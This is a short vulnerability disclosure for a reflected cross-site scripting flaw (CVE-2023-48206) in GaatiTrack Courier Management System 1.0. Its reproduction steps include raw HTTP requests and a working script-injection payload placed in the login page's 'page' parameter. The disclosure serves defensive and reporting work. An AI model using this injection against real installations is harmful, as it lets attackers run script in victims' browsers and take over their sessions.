Headline
GaatiTrack Courier Management System 1.0 Cross Site Scripting
GaatiTrack Courier Management System version 1.0 suffers from multiple cross site scripting vulnerabilities.
# Exploit Title: GaatiTrack Courier Management System v1.0 - MultipleCross-site scripting# Date: 12/112023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48206Description:Multiple reflected cross-site scripting (XSS) vulnerability exists inlogin.php, header.php page of GaatiTrack Courier Management System v1.0that allows attackers to execute arbitrary web scripts or HTML via acrafted payload injected into the Website login page parameter.Steps to Reproduce:1. Go to login and capture request data using burp suite. Your request datawill be:GET /gaatitrack/login.php HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 12. Now use XSS payload in login.php. So your request data will be:GET/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 13. Forward You request data and check browser. You will be popup withdomain.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)